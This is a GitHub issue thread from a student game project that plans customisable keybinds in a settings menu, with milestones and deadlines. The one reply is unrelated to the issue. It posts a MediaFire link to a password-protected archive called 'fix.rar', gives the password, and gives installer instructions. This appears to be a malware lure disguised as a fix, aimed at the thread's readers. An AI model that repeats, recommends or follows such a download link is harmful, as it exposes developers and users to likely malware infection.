### ISSUE TITLE
Adding keybinds to UI

### ISSUE THREAD

**Issue by Marshall-Bullis** [UQcsse3200/2024-studio-3#82]
Task: Add the interaction key bindings to the UI so that they can be adapted.
Feature: Player Action and Interaction

Users need to know how to control the player and perform actions within the game. This information will be conveyed to them in the settings menu. These controls should also be consistent across builds so that players maintain a consistent experience. The controls will also be able to be customised to the users preference. However, there are limitations on what can be a valid key, they can only be single characters and cannot overlap with other keys.
 
Example
- By default, players interact with 'E' however they can update this to 'R' or otherwise and this will be maintained across sessions.

# **Dependencies**
None

# **Milestones**
List of steps that need to be completed for this task. (Aug. 19)
- [ ] Add the key binds to the settings UI. (Aug. 20)
- [ ] Make the key binds customisable. (Aug. 23)
- [ ] Maintain the key binds across sessions. (Aug. 25)
- [ ] Generate tests to ensure valid implementation. (Aug. 27)
- [ ] Write up documentation on the wiki. (Aug. 28)
 
**Completion Deadline:** Aug. 29th

# **Documentation**
- [Main description of feature](../wiki/Player-Interactions)
- [JavaDoc](JavaDoc/Location/Package/Class)
 
# **Member**
- Marshall (Marshall-Bullis)

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
